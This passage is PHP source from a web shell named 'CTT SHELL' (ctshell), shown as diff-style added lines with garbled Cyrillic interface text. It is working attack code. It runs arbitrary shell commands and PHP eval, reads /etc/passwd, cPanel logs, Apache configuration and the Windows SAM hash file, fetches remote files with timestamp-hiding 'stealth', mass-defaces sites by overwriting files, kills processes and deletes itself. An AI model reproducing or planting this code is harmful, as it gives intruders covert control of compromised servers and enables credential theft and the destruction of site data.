+ else {echo "<br><a href=\"".$sul."act=lsa&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";} + if (file_get_contents("/etc/userdomains")) {echo "<b><font color=\"green\"><a href=\"".$sul."act=f&f=userdomains&d=/etc/&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";} + if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=\"green\"><a href=\"".$sul."act=f&f=accounting.log&d=/var/cpanel/&ft=txt\"><u><b>View cpanel logs</b></u></a></font></b><br>";} + if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$sul."act=f&f=httpd.conf&d=/usr/local/apache/conf/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} + if 
(file_get_contents("/etc/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$sul."act=f&f=httpd.conf&d=/etc/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} + } + else + { + $v = $_SERVER["WINDIR"]."\repair\sam"; + if (file_get_contents($v)) {echo "<b><font color=\"red\">You can't crack winnt passwords(".$v.") </font></b><br>";} + else {echo "<b><font color=\"green\">آû ىîوهٍه âçëîىàٍü winnt ïàًîëè. <a href=\"".$sul."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>رêà÷àٍü</b></u></a>, c èٌïîëüçîâàيèه lcp.crack+.</font></b><br>";} + } +} +if ($act == "mkfile") +{ + if ($mkfile != $d) + { + if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";} + elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";} + else {$act = "f"; $d = dirname($mkfile); if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} $f = basename($mkfile);} + } + else {$act = $dspact = "ls";} +} +if ($act == "fsbuff") +{ + $arr_copy = $sess_data["copy"]; + $arr_cut = $sess_data["cut"]; + $arr = array_merge($arr_copy,$arr_cut); + if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";} + else + { + echo "<b>File-System buffer</b><br><br>"; + $ls_arr = $arr; + $disp_fullpath = true; + $act = "ls"; + } +} +if ($act == "selfremove") +{ + if (!empty($submit)) + { + if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using ctshell v.".$cv."!"; exit; } + else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";} + } + else + { + $v = array(); + for($i=0;$i<8;$i++) {$v[] = "<a href=\"".$sul."\"><u><b>NO</b></u></a>";} + $v[] = "<a href=\"#\" onclick=\"if (confirm('Are you sure?')) document.location='".$sul."act=selfremove&submit=1';\"><u>YES</u></a>"; + shuffle($v); + $v = join("&nbsp;&nbsp;&nbsp;",$v); + echo "<b>رàىîَنàëèٍü: ".__FILE__." 
<br>آû َâهًهييû?</b><center>".$v."</center>"; + } +} +if ($act == "massdeface") +{ + if (empty($deface_in)) {$deface_in = $d;} + if (empty($deface_name)) {$deface_name = "(.*)"; $deface_name_regexp = 1;} + if (empty($deface_text_wwo)) {$deface_text_regexp = 0;} + + if (!empty($submit)) + { + $found = array(); + $found_d = 0; + $found_f = 0; + + $text = $deface_text; + $text_regexp = $deface_text_regexp; + if (empty($text)) {$text = " "; $text_regexp = 1;} + + $a = array + ( +"name"=>$deface_name, "name_regexp"=>$deface_name_regexp, +"text"=>$text, "text_regexp"=>$text_regxp, +"text_wwo"=>$deface_text_wwo, +"text_cs"=>$deface_text_cs, +"text_not"=>$deface_text_not + ); + $defacetime = getmicrotime(); + $in = array_unique(explode(";",$deface_in)); + foreach($in as $v) {ctfsearch($v);} + $defacetime = round(getmicrotime()-$defacetime,4); + if (count($found) == 0) {echo "<b>No files found!</b>";} + else + { +$ls_arr = $found; +$disp_fullpath = true; +$act = $dspact = "ls"; + } + } + else + { + if (empty($deface_preview)) {$deface_preview = 1;} + + } + echo "<form method=\"POST\">"; + if (!$submit) {echo "<big><b>Attention! 
It's a very dangerous feature, you may lost your data.</b></big><br><br>";} + echo "<input type=\"hidden\" name=\"d\" value=\"".$dispd."\"> +<b>Deface for (file/directory name): </b><input type=\"text\" name=\"deface_name\" size=\"".round(strlen($deface_name)+25)."\" value=\"".htmlspecialchars($deface_name)."\">&nbsp;<input type=\"checkbox\" name=\"deface_name_regexp\" value=\"1\" ".gchds($deface_name_regexp,1," checked")."> - regexp +<br><b>Deface in (explode \";\"): </b><input type=\"text\" name=\"deface_in\" size=\"".round(strlen($deface_in)+25)."\" value=\"".htmlspecialchars($deface_in)."\"> +<br><br><b>Search text:</b><br><textarea name=\"deface_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($deface_text)."</textarea> +<br><br><input type=\"checkbox\" name=\"deface_text_regexp\" value=\"1\" ".gchds($deface_text_regexp,1," checked")."> - regexp +&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_wwo\" value=\"1\" ".gchds($deface_text_wwo,1," checked")."> - <u>w</u>hole words only +&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_cs\" value=\"1\" ".gchds($deface_text_cs,1," checked")."> - cas<u>e</u> sensitive +&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_not\" value=\"1\" ".gchds($deface_text_not,1," checked")."> - find files <u>NOT</u> containing the text +<br><input type=\"checkbox\" name=\"deface_preview\" value=\"1\" ".gchds($deface_preview,1," checked")."> - <b>PREVIEW AFFECTED FILES</b> +<br><br><b>Html of deface:</b><br><textarea name=\"deface_html\" cols=\"122\" rows=\"10\">".htmlspecialchars($deface_html)."</textarea> +<br><br><input type=\"submit\" name=\"submit\" value=\"Deface\"></form>"; + if ($act == "ls") {echo "<hr size=\"1\" noshade><b>Deface took ".$defacetime." 
secs</b><br><br>";} +} +if ($act == "search") +{ + if (empty($search_in)) {$search_in = $d;} + if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} + if (empty($search_text_wwo)) {$search_text_regexp = 0;} + + if (!empty($submit)) + { + $found = array(); + $found_d = 0; + $found_f = 0; + $a = array + ( +"name"=>$search_name, "name_regexp"=>$search_name_regexp, +"text"=>$search_text, "text_regexp"=>$search_text_regxp, +"text_wwo"=>$search_text_wwo, +"text_cs"=>$search_text_cs, +"text_not"=>$search_text_not + ); + $searchtime = getmicrotime(); + $in = array_unique(explode(";",$search_in)); + foreach($in as $v) + { +ctfsearch($v); + } + $searchtime = round(getmicrotime()-$searchtime,4); + if (count($found) == 0) {echo "<b>No files found!</b>";} + else + { +$ls_arr = $found; +$disp_fullpath = true; +$act = $dspact = "ls"; + } + } + echo "<form method=\"POST\"> +<input type=\"hidden\" name=\"d\" value=\"".$dispd."\"> +<b>Search for (file/directory name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".gchds($search_name_regexp,1," checked")."> - regexp +<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"> +<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea> +<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".gchds($search_text_regexp,1," checked")."> - regexp +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".gchds($search_text_wwo,1," checked")."> - <u>w</u>hole words only +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".gchds($search_text_cs,1," checked")."> - cas<u>e</u> sensitive +&nbsp;&nbsp;<input type=\"checkbox\" 
name=\"search_text_not\" value=\"1\" ".gchds($search_text_not,1," checked")."> - find files <u>NOT</u> containing the text +<br><br><input type=\"submit\" name=\"submit\" value=\"Search\"></form>"; + if ($act == "ls") {echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs</b><br><br>";} +} +if ($act == "chmod") +{ + $perms = fileperms($d.$f); + if (!$perms) {echo "Can't get current mode.";} + elseif ($submit) + { + if (!isset($owner[0])) {$owner[0] = 0;} + if (!isset($owner[1])) {$owner[1] = 0; } + if (!isset($owner[2])) {$owner[2] = 0;} + if (!isset($group[0])) {$group[0] = 0;} + if (!isset($group[1])) {$group[1] = 0;} + if (!isset($group[2])) {$group[2] = 0;} + if (!isset($world[0])) {$world[0] = 0;} + if (!isset($world[1])) {$world[1] = 0;} + if (!isset($world[2])) {$world[2] = 0;} + $sum_owner = $owner[0] + $owner[1] + $owner[2]; + $sum_group = $group[0] + $group[1] + $group[2]; + $sum_world = $world[0] + $world[1] + $world[2]; + $sum_chmod = "0".$sum_owner.$sum_group.$sum_world; + $ret = @chmod($d.$f, $sum_chmod); + if ($ret) {$act = "ls";} + else {echo "<b>بçىهيهيèه ہًٍèلٍَ شàéëà (".$d.$f.")</b>: خّèلêà<br>";} + } + else + { + echo "<center><b>بçىهيهيèه ہًٍèلٍَ شàéëà</b><br>"; + $perms = view_perms(fileperms($d.$f)); + $length = strlen($perms); + $owner_r = $owner_w = $owner_x = + $group_r = $group_w = $group_x = + $world_r = $world_w = $group_x = ""; + + if ($perms[1] == "r") {$owner_r = " checked";} if ($perms[2] == "w") {$owner_w = " checked";} + if ($perms[3] == "x") {$owner_x = " checked";} if ($perms[4] == "r") {$group_r = " checked";} + if ($perms[5] == "w") {$group_w = " checked";} if ($perms[6] == "x") {$group_x = " checked";} + if ($perms[7] == "r") {$world_r = " checked";} if ($perms[8] == "w") {$world_w = " checked";} + if ($perms[9] == "x") {$world_x = " checked";} + echo "<form method=\"POST\"><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value='".htmlspecialchars($f)."'> +<input type=hidden 
name=act value=chmod><input type=hidden name=submit value=1><input type=hidden name='owner[3]' value=no_error> +<input type=hidden name='group[3]' value=no_error><input type=hidden name='world[3]' value=no_error> +<table class=table1><tr><td class=td2><table class=table1 align=center width=300 border=0 cellspacing=0 cellpadding=5><tr><td class=td2><b>Owner</b><br><br> +<input type=checkbox NAME=owner[0] value=4".$owner_r.">Read<br><input type=checkbox NAME=owner[1] value=2".$owner_w.">Write<br> +<input type=checkbox NAME=owner[2] value=1".$owner_x.">Execute</font></td><td class=td2><b>Group</b><br><br> +<input type=checkbox NAME=group[0] value=4".$group_r.">Read<br> +<input type=checkbox NAME=group[1] value=2".$group_w.">Write<br> +<input type=checkbox NAME=group[2] value=1".$group_x.">Execute</font></td> +<td class=td2><b>World</b><br><br><input type=checkbox NAME=world[0] value=4".$world_r.">Read<br> +<input type=checkbox NAME=world[1] value=2".$world_w.">Write<br> +<input type=checkbox NAME=world[2] value=1".$world_x.">Execute</font></td> +</tr></table></td></tr><tr align=center><td><input type=submit name=chmod value=\"رîًُàيèٍü\"></td></tr></table></FORM></center>"; + } +} +if ($act == "upload") +{ + $uploadmess = ""; + $uploadpath = str_replace("\\","/",$uploadpath); + if (empty($uploadpath)) {$uploadpath = $d;} + elseif (substr($uploadpath,strlen($uploadpath)-1,1) != "/") {$uploadpath .= "/";} + if (!empty($submit)) + { + global $HTTP_POST_FILES; + $uploadfile = $HTTP_POST_FILES["uploadfile"]; + if (!empty($uploadfile[tmp_name])) + { +if (empty($uploadfilename)) {$destin = $uploadfile[name];} +else {$destin = $userfilename;} +if (!move_uploaded_file($uploadfile[tmp_name],$uploadpath.$destin)) {$uploadmess .= "خّèلêà, çàمًَوà‏ùàے ôàéë ".$uploadfile[name]." 
(يه ىîوهٍ ٌêîïèًîâàٍü \"".$uploadfile[tmp_name]."\" يà \"".$uploadpath.$destin."\"!<br>";} + } + elseif (!empty($uploadurl)) + { +if (!empty($uploadfilename)) {$destin = $uploadfilename;} +else +{ + $destin = explode("/",$destin); + $destin = $destin[count($destin)-1]; + if (empty($destin)) + { + $i = 0; + $b = ""; + while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} +} +if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";} +else +{ + $st = getmicrotime(); + $content = @file_get_contents($uploadurl); + $dt = round(getmicrotime()-$st,4); + if (!$content) {$uploadmess .= "حه ىîوهٍ çàمًَçèٍü ôàéë!<br>";} + else + { + if ($filestealth) {$stat = stat($uploadpath.$destin);} + $fp = fopen($uploadpath.$destin,"w"); + if (!$fp) {$uploadmess .= "خّèلêà, ïèَّùàے ôàéëَ ".htmlspecialchars($destin)."!<br>";} + else + { +fwrite($fp,$content,strlen($content)); +fclose($fp); +if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} + } + } +} + } + } + if ($miniform) + { + echo "<b>".$uploadmess."</b>"; + $act = "ls"; + } + else + { + echo "<b>اàمًَçêà شàéëà:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$sul."act=upload&d=".urlencode($d)."\" method=\"POST\"> +ثîêàëüيûé ôàéë: <br><input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;èëè<br> +اàمًَçèٍü èç URL: <br><input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br> +رîًُàيèٍü ‎ٍîٍ ôàéëü â ïàïêَ: <br><input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br> +بىے شàéëà: <br><input name=uploadfilename size=25> +<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;تîيâهًٍèًîâàٍü èىے ôàéëà<br><br> +<input type=\"submit\" name=\"submit\" value=\"اàمًَçèٍü\"> +</form>"; + } +} +if ($act == "delete") +{ + 
$delerr = ""; + foreach ($actbox as $v) + { + $result = false; + $result = fs_rmobj($v); + if (!$result) {$delerr .= "حه ىîوهٍ َنàëèٍü ".htmlspecialchars($v)."<br>";} + if (!empty($delerr)) {echo "<b>سنàëهيèه ٌ îّèلêàىè:</b><br>".$delerr;} + } + $act = "ls"; +} +if ($act == "onedelete") +{ + $delerr = ""; + $result = false; + $result = fs_rmobj($f); + if (!$result) {$delerr .= "حه ىîوهٍ َنàëèٍü ".htmlspecialchars($f)."<br>";} + if (!empty($delerr)) {echo "<b>سنàëهيèه ٌ îّèلêàىè:</b><br>".$delerr;} + $act = "ls"; +} +if ($act == "onedeleted") +{ + $delerr = ""; + $result = false; + $result = fs_rmobj($d+'/'+$f); + if (!$result) {$delerr .= "حه ىîوهٍ َنàëèٍü ".htmlspecialchars($f)."<br>";} + if (!empty($delerr)) {echo "<b>سنàëهيèه ٌ îّèلêàىè:</b><br>".$delerr;} + $act = "ls"; +} +if ($act == "deface") +{ + $deferr = ""; + foreach ($actbox as $v) + { + $data = $deface_html; + if (eregi("%%%filedata%%%",$data)) {$data = str_replace("%%%filedata%%%",file_get_contents($v),$data);} + $data = str_replace("%%%filename%%%",basename($v),$data); + $data = str_replace("%%%filepath%%%",$v,$data); + $fp = @fopen($v,"w"); + fwrite($fp,$data); + fclose($fp); + if (!$result) {$deferr .= "Can't deface ".htmlspecialchars($v)."<br>";} + if (!empty($delerr)) {echo "<b>Defacing with errors:</b><br>".$deferr;} + } +} +if (!$usefsbuff) +{ + if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. 
For enable, set directive \"USEFSBUFF\" as TRUE.</center>";} +} +else +{ + if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); ct_sess_put($sess_data); $act = "ls";} + if ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); ct_sess_put($sess_data); $act = "ls";} + if ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} $ls_arr = array_merge($sess_data["copy"],$sess_data["cut"]); ct_sess_put($sess_data); $act = "ls";} + + if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); ct_sess_put($sess_data);} + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { +$to = $d.basename($v); +if (!fs_copy_obj($v,$d)) {$psterr .= "حه ىîوهٍ ٌêîïèًîâàٍü ".$v." to ".$to."!<br>";} +if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { +$to = $d.basename($v); +if (!fs_move_obj($v,$d)) {$psterr .= "حه ىîوهٍ ïهًهىهٌٍèٍüٌے ".$v." 
to ".$to."!<br>";} +unset($sess_data["cut"][$k]); + } + ct_sess_put($sess_data); + if (!empty($psterr)) {echo "<b>دًèêëهèâàيèه ٌ îّèلêàىè:</b><br>".$psterr;} + $act = "ls"; + } + elseif ($actarcbuff) + { + $arcerr = ""; + if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} + else {$ext = ".tar.gz";} + + if ($ext == ".tar.gz") + { +$cmdline = "tar cfzv"; + } + $objects = array_merge($sess_data["copy"],$sess_data["cut"]); + foreach($objects as $v) + { +$v = str_replace("\\","/",$v); +if (is_dir($v)) +{ + if (substr($v,strlen($v)-1,strlen($v)) != "/") {$v .= "/";} + $v .= "*"; +} +$cmdline .= " ".$v; + } + $ret = `$cmdline`; + if (empty($ret)) {$arcerr .= "حه ىîوهٍ يàçâàٍü archivator!<br>";} + $ret = str_replace("\r\n","\n"); + $ret = explode("\n",$ret); + if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} + foreach($sess_data["cut"] as $k=>$v) + { +if (in_array($v,$ret)) {fs_rmobj($v);} +unset($sess_data["cut"][$k]); + } + ct_sess_put($sess_data); + if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;} + $act = "ls"; + } + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { +$to = $d.basename($v); +if (!fs_copy_obj($v,$d)) {$psterr .= "حه ىîوهٍ ٌêîïèًîâàٍü ".$v." to ".$to."!<br>";} +if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { +$to = $d.basename($v); +if (!fs_move_obj($v,$d)) {$psterr .= "حه ىîوهٍ ïهًهىهٌٍèٍüٌے ".$v." 
to ".$to."!<br>";} +unset($sess_data["cut"][$k]); + } + ct_sess_put($sess_data); + if (!empty($psterr)) {echo "<b>دًèêëهèâàيèه ٌ îّèلêàىè:</b><br>".$psterr;} + $act = "ls"; + } +} +if ($act == "ls") +{ + if (count($ls_arr) > 0) {$list = $ls_arr;} + else + { + $list = array(); + if ($h = @opendir($d)) + { +while ($o = readdir($h)) {$list[] = $d.$o;} +closedir($h); + } + } + if (count($list) == 0) {echo "<center><b>حه ىîوهٍ îٍêًûٍü ٌïًàâî÷يèê (".htmlspecialchars($d).")!</b></center>";} + else + { + $tab = array(); + $amount = count($ld)+count($lf); + $vd = "f"; + if ($vd == "f") + { +$row = array(); +$row[] = "<b><center>بىے</b>"; +$row[] = "<b><center>ذàçىهً</center></b>"; +$row[] = "<b><center>بçىهيهي</center></b>"; +if (!$win) + {$row[] = "<b><center>آëàنهëهِ/أًَïïà</center></b>";} +$row[] = "<b><center>دًàâà</center></b>"; +$row[] = "<b><center>شَيêِèè</center></b>"; + +$k = $sort[0]; +if ((!is_numeric($k)) or ($k > count($row)-2)) {$k = 0;} +if (empty($sort[1])) {$sort[1] = "d";} +if ($sort[1] != "a") +{ + $y = "<a href=\"".$sul."act=".$dspact."&d=".urlencode($d)."&sort=".$k."a\"><img src=\"".$sul."act=img&img=sort_desc\" border=\"0\"></a></center>"; +} +else +{ + $y = "<a href=\"".$sul."act=".$dspact."&d=".urlencode($d)."&sort=".$k."d\"><img src=\"".$sul."act=img&img=sort_asc\" border=\"0\"></a></center>"; +} + +$row[$k] .= $y; +for($i=0;$i<count($row)-1;$i++) +{ + if ($i != $k) {$row[$i] = "<a href=\"".$sul."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$sort[1]."\">".$row[$i]."</a>";} +} + +$tab = array(); +$tab[cols] = array($row); +$tab[head] = array(); +$tab[dirs] = array(); +$tab[links] = array(); +$tab[files] = array(); + +foreach ($list as $v) +{ + $o = basename($v); + $dir = dirname($v); + + if ($disp_fullpath) {$disppath = $v;} + else {$disppath = $o;} + $disppath = str2mini($disppath,60); + + if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";} + elseif (in_array($v,$sess_data["copy"])) {$disppath = 
"<u>".$disppath."</u>";} + + $uo = urlencode($o); + $ud = urlencode($dir); + $uv = urlencode($v); + + $row = array(); + +if (is_dir($v)) + { + if (is_link($v)) {$disppath .= " => ".readlink($v); $type = "LINK";} + else {$type = "DIR";} + $row[] = "<a href=\"".$sul."act=ls&d=".$uv."&sort=".$sort."\"> <img src=\"".$sul."act=img&img=small_dir\" height=\"16\" width=\"16\" border=\"0\">&nbsp; ".$disppath."</a>"; + $row[] = $type; + } + elseif(is_file($v)) + { + $ext = explode(".",$o); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $row[] = "<a href=\"".$sul."act=f&f=".$uo."&d=".$ud."&\"><img src=\"".$sul."act=img&img=ext_".$ext."\" height=\"16\" width=\"16\" border=\"0\">&nbsp; ".$disppath."</a>"; + $row[] = view_size(filesize($v)); + } + $row[] = "<center>".date("d.m.Y H:i:s",filemtime($v))."</center>"; + + if (!$win) + { + $ow = @posix_getpwuid(fileowner($v)); + $gr = @posix_getgrgid(filegroup($v)); + $row[] = "<center>".$ow["name"]."/".$gr["name"]."</center>"; + } + + if (is_writable($v)) {$row[] = "<a href=\"".$sul."act=chmod&f=".$uo."&d=".$ud."\">".view_perms(fileperms($v))."</a>";} + else {$row[] = "<a href=\"".$sul."act=chmod&f=".$uo."&d=".$ud."\"><font color=\"red\">".view_perms(fileperms($v))."</font></a>";} + + if (is_dir($v)) {$row[] = "&nbsp;<input type=\"checkbox\" name=\"actbox[]\" value=\"".htmlspecialchars($v)."\">&nbsp;<a href=\"".$sul."act=onedeleted&f=".$uo."&d=".$ud."\"><img src=\"".$sul."act=img&img=odel\" title=\"Delete\" height=\"16\" width=\"19\" border=\"0\"></a>";} + else {$row[] = "&nbsp;<input type=\"checkbox\" name=\"actbox[]\" value=\"".htmlspecialchars($v)."\">&nbsp;<a href=\"".$sul."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$sul."act=img&img=change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$sul."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$sul."act=img&img=download\" title=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a 
href=\"".$sul."act=onedelete&f=".$uo."&d=".$ud."\"><img src=\"".$sul."act=img&img=odel\" title=\"Delete\" height=\"16\" width=\"19\" border=\"0\"></a>";} + + if (($o == ".") or ($o == "..")) {$tab[head][] = $row;} + elseif (is_link($v)) {$tab[links][] = $row;} + elseif (is_dir($v)) {$tab[dirs][] = $row;} + elseif (is_file($v)) {$tab[files][] = $row;} +} + } + $v = $sort[0]; + function tabsort($a, $b) + { +global $v; +return strnatcasecmp(strip_tags($a[$v]), strip_tags($b[$v])); + } + usort($tab[dirs], "tabsort"); + usort($tab[files], "tabsort"); + if ($sort[1] == "a") + { +$tab[dirs] = array_reverse($tab[dirs]); +$tab[files] = array_reverse($tab[files]); + } + $table = array_merge($tab[cols],$tab[head],$tab[dirs],$tab[links],$tab[files]); + echo "<TABLE class=table1 cellSpacing=0 cellPadding=0 width=100% border=0> +<form method=\"POST\">"; +$smsn=0; + foreach($table as $row) + { +$smsn++; + if ($smsn!=2 && $smsn!=3) { +echo "<tr>\r\n"; +foreach($row as $v) {echo "<td class=tds1 bgcolor=#242424>".$v."</td>\r\n";} +echo "</tr>\r\n"; +} + + } + echo "</table><TABLE height=1% class=table2 cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#333333 border=0> +<tr class=tr2> +<td width=8% height=1%><font size=2 color=#000000> +دàïêè: ".(count($tab[dirs])+count($tab[links]))."</font></td> +<td width=8% height=1%><font size=2 color=#000000> شàéëû: ".count($tab[files])."</font></td><td height=1% vAlign=top align=right>"; +if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) + { +echo "<input type=\"submit\" name=\"actarcbuff\" value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"actpastebuff\" value=\"آٌٍàâèٍü\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"actemptybuff\" value=\"دٌٍَîé لَôهً\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"; + } + 
echo "<select name=\"act\"><option value=\"".$act."\">ر îٍîلًàييûى:</option>"; + echo "<option value=\"delete\"".gchds($dspact,"delete"," selected").">سنàëèٍü</option>"; + if ($usefsbuff) + { +echo "<option value=\"cut\"".gchds($dspact,"cut"," selected").">آûًàçàٍü</option>"; +echo "<option value=\"copy\"".gchds($dspact,"copy"," selected").">تîïèًîâàٍü</option>"; +echo "<option value=\"unselect\"".gchds($dspact,"unselect"," selected").">حهâûلًàٍü</option>"; + } + if ($dspact == "massdeface") {echo "<option value=\"deface\"".gchds($dspact,"deface"," selected").">حهâûلًàٍü</option>";} + echo "</select>&nbsp;<input type=\"submit\" value=\"دîنٍâهًنèٍü\">"; + echo "</form>"; + +echo "</td></tr></table>"; +echo "</td></tr></table><br><center><font size=2 color=#aaaaaa>[<a href=http://ctt.void.ru>CTT</a>] SHELL ver ".$shver."</font></center>"; + } + +} +if ($act == "cmd") +{ + if (!empty($submit)) + { + echo "<b>ذهçَëüٍàٍ âûïîëيهيèے ‎ٍà êîىàينà</b>:<br>"; + $tmp = ob_get_contents(); + $olddir = realpath("."); + @chdir($d); + if ($tmp) + { +ob_clean(); +myshellexec($cmd); +$ret = ob_get_contents(); +$ret = convert_cyr_string($ret,"d","w"); +ob_clean(); +echo $tmp; +if ($cmd_txt) +{ + $rows = count(explode(" +",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; +} +else {echo $ret;} + } + else + { +if ($cmd_txt) +{ + echo "<br><textarea cols=\"122\" rows=\"15\" readonly>"; + myshellexec($cmd); + echo "</textarea>"; +} +else {echo $ret;} + } + @chdir($olddir); + } + else {echo "<b>تîىàينà âûïîëيهيèے:</b>"; if (empty($cmd_txt)) {$cmd_txt = true;}} + echo "<form action=\"".$sul."act=cmd\" method=\"POST\"><textarea name=\"cmd\" cols=\"122\" rows=\"10\">".htmlspecialchars($cmd)."</textarea><input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><br><br><input type=\"submit\" name=\"submit\" value=\"آûïîëيèٍü\"><input type=\"hidden\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " 
checked";} echo "></form>"; +} +if ($act == "ps_aux") +{ + echo "<b>دًîِهٌٌû:</b><br>"; + if ($win) { +echo "<pre>"; +system('tasklist'); +echo "</pre>"; +} + else + { + if ($pid) + { +if (!$sig) {$sig = 9;} +echo "Sending signal ".$sig." to #".$pid."... "; +$ret = posix_kill($pid,$sig); +if ($ret) {echo "ok. he is dead, amen.";} +else {echo "ERROR. Can't send signal ".htmlspecialchars($sig).", to process #".htmlspecialchars($pid).".";} + } + $ret = `ps -aux`; + if (!$ret) {echo "Can't execute \"ps -aux\"!";} + else + { +$ret = htmlspecialchars($ret); +$ret = str_replace(""," ",$ret); +while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} +$prcs = explode("\n",$ret); +$head = explode(" ",$prcs[0]); +$head[] = "ACTION"; +unset($prcs[0]); +echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">"; +echo "<tr border=\"1\">"; +foreach ($head as $v) {echo "<td><b>&nbsp;&nbsp;&nbsp;".$v."</b>&nbsp;&nbsp;&nbsp;</td>";} +echo "</tr>"; +foreach ($prcs as $line) +{ + if (!empty($line)) + { + echo "<tr>"; + $line = explode(" ",$line); + $line[10] = join(" ",array_slice($line,10,count($line))); + $line = array_slice($line,0,11); + $line[] = "<a href=\"".$sul."act=ps_aux&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>"; + foreach ($line as $v) {echo "<td>&nbsp;&nbsp;&nbsp;".$v."&nbsp;&nbsp;&nbsp;</td>";} + echo "</tr>"; + } +} +echo "</table>"; + } + } +} +if ($act == "eval") +{ + if (!empty($eval)) + { + echo "<b>ذهçَëüٍàٍ âûïîëيهيèے ‎ٍîٍ PHP-êîن</b>:<br>"; + $tmp = ob_get_contents(); + $olddir = realpath("."); + @chdir($d); + if ($tmp) + { +ob_clean(); +eval($eval); +$ret = ob_get_contents(); +$ret = convert_cyr_string($ret,"d","w"); +ob_clean(); +echo 